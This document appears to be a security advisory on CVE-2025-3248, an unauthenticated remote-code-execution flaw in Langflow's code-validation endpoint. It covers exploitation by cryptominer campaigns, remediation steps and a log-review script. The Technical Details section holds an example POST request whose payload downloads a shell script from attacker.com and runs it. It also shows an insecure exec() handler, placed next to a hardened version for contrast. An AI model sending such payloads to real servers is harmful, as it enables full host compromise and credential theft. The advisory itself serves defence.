What is Langflow?
Langflow is an open-source Python web application that provides a visual drag-and-drop interface for building LLM-powered AI agent pipelines and chatbots using frameworks like LangChain. Developers use it to design, prototype, and deploy AI workflows connecting language models to external data sources, APIs, and tools. Langflow is widely used in enterprise AI development environments and is often deployed as an internal service — sometimes exposed to the internet for team collaboration.
The platform's core functionality involves executing user-defined Python code as part of AI pipeline components. This by-design code execution capability makes missing authentication on execution endpoints particularly dangerous.
Overview
CVE-2025-3248 is a missing authentication vulnerability (CWE-306) in Langflow's /api/v1/validate/code endpoint. The endpoint accepts arbitrary Python code and executes it server-side using Python's exec() function without requiring any authentication. An unauthenticated remote attacker can send a crafted HTTP request with malicious Python code and achieve immediate remote code execution on the Langflow host. The issue is fixed in version 1.3.0, but active exploitation targeting cryptominer deployment was confirmed before the CISA KEV listing.
Affected Versions
| Product | Vulnerable | Fixed |
|---|---|---|
| Langflow | < 1.3.0 | 1.3.0 |
Technical Details
The /api/v1/validate/code endpoint was designed to validate user-submitted Python component code during AI pipeline construction. The endpoint accepts a JSON body containing Python source code, passes it to Python's built-in exec() function without sandboxing or authentication, and returns the execution result.
An attacker simply sends a POST request to this endpoint with any Python code they want to execute — no credentials, no token, no session required. Because exec() runs in the context of the Langflow Python process (which may have access to environment variables, file system paths, AI API keys, and database credentials stored in the application), the impact is equivalent to full server compromise.
Example attack pattern:
```http
POST /api/v1/validate/code HTTP/1.1
Host: <target>:7860
Content-Type: application/json

{"code": "import subprocess; subprocess.run(['curl', 'attacker.com/shell.sh', '-o', '/tmp/s']); subprocess.run(['sh', '/tmp/s'])"}
```
Key characteristics:
- Zero prerequisites — no account, no prior access, no user interaction
- Direct Python code execution in the server process context
- Langflow typically stores LLM API keys (OpenAI, Anthropic, etc.) in environment variables accessible via os.environ
- Often deployed with access to internal databases and services
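The pattern described in this section, next to a hardened form, as an added illustration that is not Langflow's code or its actual patch. The function names, the `x-api-key` header, `API_TOKEN` and the size cap are assumptions made for the example; the hardened handler authenticates before touching the input and validates syntax with `ast.parse()`, which parses the source without running it.

```python
import ast
import hmac

# Assumption: a static token stands in for the application's real auth layer.
API_TOKEN = "constructed-example-token"
MAX_SOURCE_CHARS = 100_000  # assumption: cap input before handing it to the parser

def validate_code_vulnerable(body):
    """The pattern described above: no auth check, submitted source goes to exec()."""
    scope = {}
    exec(body["code"], scope)  # runs caller-supplied code inside the server process
    return {"status": 200, "defined": sorted(k for k in scope if not k.startswith("__"))}

def is_authenticated(headers):
    supplied = headers.get("x-api-key", "")
    return hmac.compare_digest(supplied.encode(), API_TOKEN.encode())

def validate_code_hardened(headers, body):
    """Authenticate first, then check syntax with ast.parse(), which never runs the code."""
    if not is_authenticated(headers):
        return {"status": 401, "errors": ["authentication required"]}
    code = body.get("code")
    if not isinstance(code, str) or len(code) > MAX_SOURCE_CHARS:
        return {"status": 422, "errors": ["'code' must be a string within the size limit"]}
    try:
        tree = ast.parse(code)
    except (SyntaxError, ValueError) as exc:  # ValueError: e.g. null bytes in the source
        return {"status": 200, "errors": [str(exc)]}
    defined = [n.name for n in tree.body if isinstance(n, (ast.FunctionDef, ast.ClassDef))]
    return {"status": 200, "errors": [], "defined": defined}

# Constructed, harmless input: the top-level assignment only takes effect if the code runs.
SAMPLE = {"code": "ran = True\ndef build():\n    return 1\n"}

if __name__ == "__main__":
    print("vulnerable:", validate_code_vulnerable(SAMPLE))
    print("hardened, no key:", validate_code_hardened({}, SAMPLE))
    print("hardened, with key:", validate_code_hardened({"x-api-key": API_TOKEN}, SAMPLE))
```

The vulnerable handler reports `ran` as defined because the submitted code actually executed; the hardened one reports only the names it found in the syntax tree.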
Discovery
The vulnerability was identified and reported to the Langflow project maintainers. A fix was merged to the main branch on March 28, 2025, and released in version 1.3.0 on April 7, 2025.
Exploitation Context
Exploitation began before the CISA KEV listing on May 5, 2025. Cryptominer campaigns were the primary observed payload — attackers deployed XMRig (Monero miner) and similar cryptocurrency mining software on compromised Langflow instances, leveraging the typically high-CPU cloud infrastructure used for AI workloads.
Fortinet FortiGuard Labs documented active exploitation campaigns targeting internet-exposed Langflow deployments. The combination of easy exploitation (single POST request, no auth) and high-value targets (AI development environments with LLM API keys and cloud credentials) made Langflow an attractive target.
Shodan and Censys scans revealed hundreds to thousands of internet-exposed Langflow instances at the time of exploitation, with many running in cloud environments (AWS, GCP, Azure) where compromised credentials could enable further cloud account takeover.
Remediation
- Upgrade to Langflow 1.3.0 or later immediately. The CISA deadline was May 26, 2025.
- Do not expose Langflow to the internet — it is designed as an internal development tool. Place it behind a VPN, authentication proxy, or firewall that restricts access to authorized users only.
- Rotate all LLM API keys stored in or accessible from the Langflow environment — OpenAI, Anthropic, and similar API keys may have been exfiltrated by attackers.
- Audit cloud credentials accessible from the Langflow host environment — instance roles (IAM), environment variables, and mounted secrets.
- Check for cryptominer processes: look for unexpected CPU-intensive processes (XMRig, xmrig, minerd), unusual outbound connections to mining pools, and crontab entries.
- Review access logs for POST requests to /api/v1/validate/code from unexpected IP addresses.
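One way to run the access-log review from the last item, as an added example that is not part of the original advisory or of Langflow. It assumes a combined-format access log from a reverse proxy in front of Langflow and an allowlist of expected client networks (`ALLOWED_NETS`); both are assumptions to adjust, and the sample lines are constructed.

```python
import ipaddress
import re
from collections import Counter

# Assumption: combined-format access log from a reverse proxy in front of Langflow.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
TARGET_PATH = "/api/v1/validate/code"
# Assumption: networks from which calls to the endpoint are expected.
ALLOWED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

def is_allowed(ip_text):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # unparseable client field: treat as unexpected
    return any(ip in net for net in ALLOWED_NETS)

def find_suspicious(lines):
    """(ip, timestamp, status) for POSTs to TARGET_PATH from outside ALLOWED_NETS.
    Query strings and a trailing slash are ignored so path variants still match."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0].rstrip("/") != TARGET_PATH:
            continue
        if not is_allowed(m["ip"]):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits

def summarize(hits):
    """Per-IP totals, plus how many requests got a 2xx response."""
    total = Counter(ip for ip, _, _ in hits)
    ok = Counter(ip for ip, _, status in hits if 200 <= status < 300)
    return {ip: {"requests": n, "succeeded": ok[ip]} for ip, n in total.items()}

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
10.1.2.3 - - [02/May/2025:09:14:01 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 112
203.0.113.45 - - [02/May/2025:09:15:27 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 98
203.0.113.45 - - [02/May/2025:09:15:29 +0000] "POST /api/v1/validate/code/ HTTP/1.1" 200 98
198.51.100.7 - - [02/May/2025:09:20:10 +0000] "GET /api/v1/validate/code HTTP/1.1" 405 31
198.51.100.7 - - [02/May/2025:09:20:12 +0000] "POST /api/v1/validate/code?x=1 HTTP/1.1" 403 17
""".splitlines()

if __name__ == "__main__":
    print(summarize(find_suspicious(SAMPLE_LOG)))
```

Requests from unexpected addresses that returned 2xx on a version below 1.3.0 are the ones to prioritize when deciding which keys and credentials to rotate.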
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-3248 |
| Vendor / Product | Langflow — Langflow |
| NVD Published | 2025-04-07 |
| NVD Last Modified | 2025-11-06 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-306 |
| CISA KEV Added | 2025-05-05 |
| CISA KEV Deadline | 2025-05-26 |
| Known Ransomware Use | No |
Timeline
| Date | Event |
|---|---|
| 2025-03-28 | Fix merged to Langflow main branch |
| 2025-04-07 | Langflow 1.3.0 released with fix; CVE published |
| 2025-05-05 | Added to CISA Known Exploited Vulnerabilities catalog; active exploitation in cryptominer campaigns confirmed |
| 2025-05-26 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| GitHub Security Advisory GHSA-c995-4fw3-j39m — Langflow CVE-2025-3248 | Vendor Advisory |
| NVD — CVE-2025-3248 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| Fortinet — Exploitation of Langflow CVE-2025-3248 | Security Research |
| CYFIRMA — CVE-2025-3248 Technical Analysis | Security Research |